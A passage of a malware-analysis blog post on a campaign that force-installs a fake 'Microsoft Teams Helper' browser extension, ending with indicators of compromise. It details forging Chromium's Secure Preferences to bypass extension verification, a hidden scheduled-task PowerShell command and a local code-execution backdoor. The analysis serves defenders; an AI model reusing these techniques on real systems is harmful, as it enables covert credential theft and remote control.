extension<\/td><\/tr><tr><td width=\"302\">Secure Preferences<\/td><td width=\"302\">Forged version to force-install the extension<\/td><\/tr><tr><td width=\"302\">Preferences<\/td><td width=\"302\">Forged version<\/td><\/tr><\/tbody><\/table><p>Before deploying the payload, the script force-terminates all running instances of the targeted browser. It then extracts the extension.zip alongside forged Secure Preferences, Preferences and manifest.json files into a browser\u2019s extension folder. The example below shows the corresponding path for Microsoft Edge:<\/p><table><tbody><tr><td width=\"604\"><pre>%appdata%\\..\\local\\Microsoft\\Edge\\User Data\\Default\\Extensions\\&lt;id&gt;\\<\/pre><\/td><\/tr><\/tbody><\/table><p>It continues by extracting the extension archive into every detected profile directory and finally relaunches the browser(s) with the argument\u00a0&#8211;restore-last-session to minimize user suspicion and keep the victim&#8217;s prior tab state.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5c85c214 elementor-widget elementor-widget-image\" data-id=\"5c85c214\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild5.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild5\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2OTAsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDUucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"192\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27690 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild5-768x230.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild5-768x230.png 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild5-300x90.png 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild5.png 829w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 5: Extraction of malicious extension and files to browser instances<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-39948ff1 elementor-widget elementor-widget-text-editor\" data-id=\"39948ff1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>Circumventing chromium\u2019s sideloaded extension policies<\/strong><\/p><p>Under normal circumstances, Chromium rejects extensions that are sideloaded outside the Web Store or enterprise policy, either blocking them entirely or showing a prominent security warning. The attackers bypass this protection by forging the Secure Preferences file using data previously exfiltrated from the victim&#8217;s browser profile. A new entry for the malicious extension is added, and the entire file is re-signed with a cryptographically valid super_mac. This super_mac is computed as HMAC-SHA256 over the file&#8217;s JSON contents, keyed by a seed tied to the browser installation path and a device_id derived from the machine SID; these two values were extracted in the initial request (to the \/init endpoint) and therefor allowed the server to compute a valid signature over the forged file. The extension entry uses location: 4, marking it as an unpacked developer extension. Because Chromium does not enforce per-extension MAC validation for developer-mode extensions, the malicious extension loads without triggering any security prompt and remains completely stealthy.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-728b709b elementor-widget elementor-widget-image\" data-id=\"728b709b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild6\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2OTIsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDYucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"439\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27692 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6-768x527.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6-768x527.png 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6-300x206.png 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6-1024x702.png 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild6.png 1384w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 6: manifest.json (left) and Secure Preferences (right) retained in the response<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4e14cf98 elementor-widget elementor-widget-text-editor\" data-id=\"4e14cf98\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The extension is installed as \u201cMicrosoft Teams Helper\u201d and auto-starts with the browser from now on.<\/p><h2>Persistence &amp; local backdoor<\/h2><p>After the initial execution, C2 handshake and the browser extension installation, the PowerShell script establishes long-term persistence through a Windows Scheduled Task. This is achieved by querying a second C2 endpoint (\/gate\/auto\/version\/&lt;GUID&gt;) that delivers a PowerShell payload specifically engineered for re-execution. The payload is transmitted in the body of the response and directly written to %ProgramData% under the specified name in the x-filename header. In the present case, the filename was \u201conedrive-sync.ps1\u201d.<\/p><p>Immediately after writing, the PowerShell script is assigned the attributes Hidden and System, resulting in the file not being shown in a File Explorer with default configuration.<\/p><p>The scheduled task is then registered under the name the server specified in the response\u2019s x-task header. The scheduled task executes the following command every 60 seconds:<\/p><table><tbody><tr><td width=\"604\"><pre>conhost.exe --headless powershell -ep bypass -file \u201c%ProgramData%\\&lt;x-filename&gt;<\/pre><\/td><\/tr><\/tbody><\/table>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-69be7bde elementor-widget elementor-widget-image\" data-id=\"69be7bde\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild7.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild7\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2OTQsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDcucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"225\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27694 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild7-768x270.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild7-768x270.png 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild7-300x106.png 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild7.png 890w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 7: Registration of the scheduled task with received payload<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7b5d386 elementor-widget elementor-widget-text-editor\" data-id=\"7b5d386\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The executed &lt;x-filename&gt; script mainly (re-)starts a local HTTP server on 127.0.0.1:58172. Because it is executed every 60 seconds, the malware ensures that this service keeps running, as it serves as a bridge between the previously downloaded browser extension and the host operating system. The local server offers two endpoints that serve different purposes: \/run allows running arbitrary PowerShell code and \/window is used for memory patching and window hijacking.<\/p><p><strong>The \/run endpoint<\/strong><\/p><p>This endpoint grants the browser extension (or any process able to reach 127.0.0.1:58172) the ability to execute arbitrary PowerShell code on the victim&#8217;s machine. The execution occurs in the user context of the currently logged-in account, with full access to the file system, registry, and network.<\/p><p>To execute commands, the endpoint can be queried by a POST request with a JSON body. The script executes values of the command key by spawning a new PowerShell instance and returning output as a JSON object with success, output, or error keys.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6c5e74eb elementor-widget elementor-widget-image\" data-id=\"6c5e74eb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild8.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild8\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2OTYsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDgucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"564\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27696 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild8.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild8.png 692w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild8-300x264.png 300w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 8: Code block responsible for running arbitrary PowerShell code<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5af26d58 elementor-widget elementor-widget-text-editor\" data-id=\"5af26d58\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>The \/window endpoint<\/strong><\/p><p>The second endpoint registered is used to patch memory\/processes and hijack windows. Arbitrary application windows can therefore be suppressed or hidden, concealing spawned processes from the user. It can be queried with a POST request and a JSON body containing the specific process alongside its designated patches, width, height and more. This functionality is used by the extension (seen in section \u201cWebSocket RAT\u201d) to hide malicious windows that are used for observing the user.<\/p><h2>Browser extension functionality<\/h2><p>Analyzing the received extension.zip reveals a highly sophisticated browser extension that functions less like a simple credential stealer and more like a comprehensive remote access platform. The extension consists of five JavaScript files, all obfuscated using\u00a0obfuscator.io\u00a0(rotating string arrays, hex indices, transitive alias chains, and control-flow flattening) to complicate static analysis and hide its C2 infrastructure:<\/p><table><tbody><tr><td width=\"113\"><strong>File<\/strong><\/td><td width=\"142\"><strong>Size (deobfuscated)<\/strong><\/td><td width=\"349\"><strong>Functionality<\/strong><\/td><\/tr><tr><td width=\"113\">background.js<\/td><td width=\"142\">~60kB<\/td><td width=\"349\">Service Worker, C2 orchestrator, command dispatcher<\/td><\/tr><tr><td width=\"113\">backup.js<\/td><td width=\"142\">~50kB<\/td><td width=\"349\">Backup copy of background.js<\/td><\/tr><tr><td width=\"113\">content.js<\/td><td width=\"142\">~4kB<\/td><td width=\"349\">hooks forms and inputs on every visited page<\/td><\/tr><tr><td width=\"113\">offscreen.js<\/td><td width=\"142\">~14kB<\/td><td width=\"349\">screen recorder and clipboard clipper<\/td><\/tr><tr><td width=\"113\">proxy.js<\/td><td width=\"142\">~15kB<\/td><td width=\"349\">WebSocket RAT for remote code execution<\/td><\/tr><\/tbody><\/table><p>The extension also contains a file called msgpack.min.js, which is the minimized JavaScript file of the msgpack@3.1.2 library. Furthermore, a file called offscreen.html is included in the extension, which is just a wrapper to call offscreen.js. Since this file is not obfuscated and unique enough, its presence with the hash<\/p><pre>BD64816AE9382CEF4C1F852C15A7F715CD41E0B441B4F1F2E661AEF776848B21<\/pre><p>in the<\/p><pre>%appdata%\\..\\local\\Microsoft\\Edge\\User Data\\Default\\Extensions\\&lt;id&gt;\\ <\/pre><p>folder is a certain indicator that an infection has taken place.<\/p><p>As seen in figure 6, the manifest declares the extension as \u201cMicrosoft Teams Helper\u201d (version 1.0.10), impersonating a legitimate Microsoft single-sign-on helper. What sets this extension apart from commodity stealers is the breadth of permissions it requests. The manifest.json defines 21 permissions, which notably include:<\/p><table><tbody><tr><td width=\"302\"><strong>Permission<\/strong><\/td><td width=\"302\"><strong>Abuse Potential<\/strong><\/td><\/tr><tr><td width=\"302\">cookies<\/td><td width=\"302\">Read all session cookies<\/td><\/tr><tr><td width=\"302\">scripting<\/td><td width=\"302\">Inject JavaScript into any page<\/td><\/tr><tr><td width=\"302\">history<\/td><td width=\"302\">Extract full browser history<\/td><\/tr><tr><td width=\"302\">activeTabs\/tabs<\/td><td width=\"302\">Monitor and manipulate all active tabs<\/td><\/tr><tr><td width=\"302\">clipboardRead\/Write<\/td><td width=\"302\">Read and replace clipboard data<\/td><\/tr><tr><td width=\"302\">debugger<\/td><td width=\"302\">Allow usage of chromium\u2019s debugger (API)<\/td><\/tr><\/tbody><\/table><p>To turn the victim\u2019s browser into a fully transparent proxy, the extension grants itself the host_permission &lt;all_urls&gt;, meaning unrestricted access to every website the victim visits. The injected and overwritten Secure Preference file specifies the new extension as known and trusted while also running it on browser startup, meaning every new browser session after the infection is compromised. Inside the forged file, the following attributes are registered that collectively list the extension as trusted:<\/p><ul><li>location: 4: In Chromium, this corresponds to an unpacked developer extension that is <em>not<\/em> verified by per-extension MAC verification<\/li><li>creation_flags: 38: Automatically activate the extension without user confirmation<\/li><li>newAllowFileAccess: true: Explicitly allow access to files<\/li><li>super_mac: Valid HMAC-SHA256 that leads to the browser treating the whole file as \u201cuser-approved\u201d, and the \u201cnew\u201d entry is accepted without additional per-extension scrutiny<\/li><\/ul><h3>Data collection<\/h3><p>The primary data collection is handled by content.js, which implements three concurrent attack vectors to harvest even more credentials. It hooks into all &lt;form&gt; submit events to exfiltrate field names, values and timestamps (via hookForms()), while simultaneously monitoring specific input fields outside forms via blur and keypress events (hookInputs()).<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-14928a1f elementor-widget elementor-widget-image\" data-id=\"14928a1f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild9.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild9\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2OTgsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDkucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"553\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27698 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild9.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild9.png 674w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild9-300x259.png 300w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 9: hookForms() adds listener to all forms and logs contents<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-55f6acc7 elementor-widget elementor-widget-text-editor\" data-id=\"55f6acc7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Notably, these input selectors are not hard-coded. Instead, the extension uses a fetchConfig() function to query the C2 server for domain-specific targeting configurations. The response includes specific URLs to monitor and the instruction to check for keylogger and input fields that should further be monitored. It also has the possibility to inject any JS code by adding an onreset attribute and then triggering that reset, which circumvents many CSP-checks.<\/p><p>To further ensure that no data is missed, a document-wide keylogger is deployed that captures nearly every keystroke, sending the data back to the background.js script for exfiltration (setupKeylogger()).<\/p><h3>Surveillance<\/h3><p>The extension operates two distinct surveillance channels, one being passive and one active, that differ fundamentally in their mechanism, trigger, and output format.<\/p><p>When the victim navigates to a URL matching one of the 125+ patterns in SCREENSHOT_CONFIG.target_urls (major banking, brokerage, and cryptocurrency sites), background.js automatically captures a static PNG screenshot using chrome.tabs.captureVisibleTab() and uploads it directly to the \/gate\/screenshots\/&lt;uuid&gt; endpoint. This system is rate-limited to 20 screenshots per hour per target URL, with a 30-second cooldown between captures of the same pattern, and a 1,5-second delay after page load to ensure content has rendered. Each upload includes the victim&#8217;s current URL, the base64-encoded PNG image data, and the triggering pattern string.<\/p><p>The second channel is a real-time H.264 video stream, which is managed by the CDPServerProxy class inside backup.js. Unlike the first channel, the video stream is only activated when the C2 server sends a start_cdp command. Upon activation, a WebSocket alongside a browser window is opened, which uses the \/window endpoint from the local HTTP webserver previously deployed on port 58172 to patch the browser\u2019s memory and hide the window. The video encoding itself is handled by offscreen.js, which instantiates a WebCodecs VideoEncoder configured for AVC\/H.264 output. When background.js receives encoded frame data or the CDP stream produces frames, they are fed through the VideoEncoder and streamed to the C2.<\/p><p>Alongside this visual surveillance, offscreen.js operates a &#8220;Crypto Clipper&#8221; that polls the system\u2019s clipboard every 500 milliseconds. By using regex patterns for coins such as BTC, LTC, ETH, SOL, NEO, EOS, BCH, KASPA and over 20 more, the extension silently replaces detected wallet addresses with those belonging to the attacker, redirecting possible payments to the attacker\u2019s wallets.<\/p><h3>WebSocket RAT<\/h3><p>The most technically advanced components are the two WebSockets originating from proxy.js and backup.js that establish persistent WebSocket connections to the C2 server. This turns the victim&#8217;s browser into a full WebSocket RAT, allowing the attacker to trigger functions like cookie exfiltration, authentication and dynamic JavaScript injection, stream live video and intercept network traffic.<\/p><p>proxy.js implements a straightforward JSON-RPC (remote procedure call) protocol over a WebSocket connection to a C2-supplied ws:\/\/&lt;ip&gt;:&lt;port&gt;. It does not initiate the connection autonomously; it waits for background.js to relay a &#8220;start_proxy&#8221; command from the C2 with the target IP and port.<\/p><p>Its critical capability is the perform_http_request() function, which enables the attacker to abuse the browser as an HTTP proxy. By executing requests through the victim&#8217;s own authenticated sessions, the attacker can bypass CORS protections, reuse cookies and effectively perform all actions on behalf of the authenticated user.<\/p><p>The second, more powerful RAT that lives inside backup.js enables the attacker to gain full remote control over any browser tab by leveraging the chrome.debugger API that is used in the mentioned CDPServerProxy class. Upon receiving a start_cdp command, the extension attaches the browser\u2019s debugger to the targeted tab and connects to the WebSocket on the attacker\u2019s IP. The WebSocket heartbeat is maintained through the proxy&#8217;s own ping\/pong mechanism, with reconnection logic on disconnect.<\/p><p>This CDP channel transforms the victim&#8217;s browser into a fully transparent proxy far beyond what proxy.js achieves. Where proxy.js can relay individual HTTP requests, CDPServerProxy can observe and manipulate every byte of network traffic, every DOM element, and every user interaction in real time. The use of MessagePack (a compact binary serialization format) rather than JSON also makes this channel more efficient for streaming large volumes of video and interception data.<\/p><h3>C2 communication &amp; orchestration<\/h3><p>All these operations are orchestrated by background.js, which manages the communication with the C2 domain olive3451[.]com through various endpoints such as \/gate\/reports and \/gate\/cookies. Although the extension is versatile, the internal strings reveal a focus on Facebook Business and Ads accounts. The references to adtrust_ds, business_u and spend_cap indicate that one of the primary objectives is the hijacking of high-value advertising accounts and cryptocurrency assets. Contrary to what one might initially assume of \u201ceasy money\u201d, this might rather relate to using these existing ad accounts to further promote the malicious domains and lure more users into downloading the package from their impersonating domains.<\/p><p>A response from the C2 server can also include the instruction to run a command on the victim\u2019s machine, which results in background.js communicating with the local HTTP webserver\u2019s \/run endpoint. Forwarded commands thereby bridge the gap between browser context and host operating system, enabling full Remote Code Execution (RCE), while the output is returned to the \/gate\/cmd-done endpoint.<\/p><h2>Conclusion<\/h2><p>Ultimately, this extension represents a full-scale browser-based RAT. It watches everything the victim does: recording their screen when they visit banking or cryptocurrency sites, silently swapping wallet addresses on the clipboard, and logging every keystroke \u2013 all while simultaneously turning their browser into a proxy the attacker can use to make authenticated requests as if they were the victim. Two independent remote access channels give the operator full control: one for relaying individual HTTP requests, and a more powerful one that attaches Chrome&#8217;s debugger protocol to any tab, enabling live video streaming and complete DOM manipulation in real time.<\/p><p>The forced installation via forged Secure Preferences files with valid MACs and location: 4 causes Chromium to treat the extension as a pre-approved developer install, bypassing per-extension signature verification and making standard uninstallation through the browser UI ineffective. Until both the browser profile files and the scheduled task payload on disk are simultaneously removed, the extension reestablishes itself within 60 seconds of cleanup.<\/p><p>In comparison to the relatively simple PowerShell credential stealer covered in part one, this second stage represents a fundamental shift in both scope and persistence. Given that these impersonation domains surfaced in real search results alongside the legitimate products they mimicked, it is likely that a significant number of users fell victim to this campaign.<\/p><h2>Indicators of compromise (IoCs)<\/h2><p>C2 server URLs<\/p><ul><li>events[.]ms709[.]com<\/li><li>metrics[.]msft17[.]com<\/li><li>events[.]msft23[.]com<\/li><li>mo2307[.]com<\/li><li>olive3451[.]com<\/li><li>celsius[.]proper829[.]com<\/li><\/ul><p>C2 server IP addresses<\/p><ul><li>93[.]152[.]217[.]97<\/li><li>104[.]21[.]87[.]46<\/li><li>172[.]67[.]141[.]127<\/li><li>45[.]150[.]66[.]3<\/li><li>146[.]185[.]233[.]59<\/li><\/ul><p>Malicious URLs of the campaign<\/p><ul><li>7zip-setup[.]us[.]com<\/li><li>cyber-duck[.]co[.]com<\/li><li>cyberduck[.]info<\/li><li>cyberduck-download[.]org<\/li><li>cyberduck-ftp[.]com<\/li><li>em-editor[.]co[.]com<\/li><li>emeditor-download[.]co[.]com<\/li><li>filezilla-project[.]us[.]com<\/li><li>getsharex-download[.]com<\/li><li>getsharex-setup[.]com<\/li><li>joplin-app[.]co[.]com<\/li><li>joplin-desktop[.]app<\/li><li>joplin-opensource[.]co[.]com<\/li><li>keepass[.]us[.]com<\/li><li>mullvad-download[.]it[.]com<\/li><li>mullvad-download[.]org<\/li><li>mullvad-vpn[.]us[.]org<\/li><li>putty-setup[.]us[.]com<\/li><li>s3-browser[.]quest<\/li><li>s3-browser-download[.]blog<\/li><li>winscp-app[.]org<\/li><li>winscp-download[.]us[.]org<\/li><li>winscp-downloads[.]com<\/li><li>winscp-ftps[.]com<\/li><li>winscp-setup[.]net<\/li><li>gemini-cli[.]co[.]com<\/li><li>use-gemini[.]com<\/li><li>gemini-setup[.]com<\/li><li>geminicli[.]io<\/li><li>use-claude[.]com<\/li><li>setup-code[.]com<\/li><li>claudecode[.]us[.]org<\/li><li>nodejs-download[.]co[.]com<\/li><\/ul><p>Malicious website host<\/p><ul><li>5[.]8[.]18[.]129<\/li><li>5[.]8[.]18[.]88<\/li><li>109[.]107[.]170[.]57<\/li><\/ul><p>Backdoor<\/p><ul><li>Local webserver listening on port 58172<\/li><\/ul><p>Browser Extension Name:<\/p><ul><li>Microsoft Teams Helper<\/li><\/ul><p>Hashes:<\/p><ul><li>1b2dc2ce6f709119891a0de6f05f7658795c895779dc20da96b82be23c074eab background.js<\/li><li>eb84571064d52069c2d6bc2c14bf8e0509eb9e26098fbcb2fd6e0e03b635a6dc backup.js<\/li><li>dd3ccebc84478e93771d9bfe33d8fda17207f304613390173a92eda8cdc0e30d content.js<\/li><li>9fada26b16c1e765ac70924389c13ce4d3a52d054dfe125f5cd2c189ffbb078a icon.png<\/li><li>c503029f21b821097f050be0d0ae8f87e211e2ca29bedeed39272b0b9cd4eb28 msgpack.min.js<\/li><li>bd64816ae9382cef4c1f852c15a7f715cd41e0b441b4f1f2e661aef776848b21 offscreen.html<\/li><li>46860643ff745f7c012022d8a22d6b09b1e16a408c08d58dc832089a65c7d1a2 offscreen.js<\/li><li>cfb3798fce8a708f4c8f4e9857b6745ef530edf3f1b2efc4f4cb94afa49027a5 proxy.js<\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-4f57e068\" data-id=\"4f57e068\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7092e58 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7092e58\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-47dcf81a\" data-id=\"47dcf81a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2413a9d3 elementor-widget__width-initial elementor-widget elementor-widget-heading\" data-id=\"2413a9d3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Further blog articles<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-50c8c486\" data-id=\"50c8c486\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-271b9cf1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"271b9cf1\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a164451\" data-id=\"a164451\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-627305a9 elementor-grid-3 elementor-grid-tablet-2 elementor-grid-mobile-1 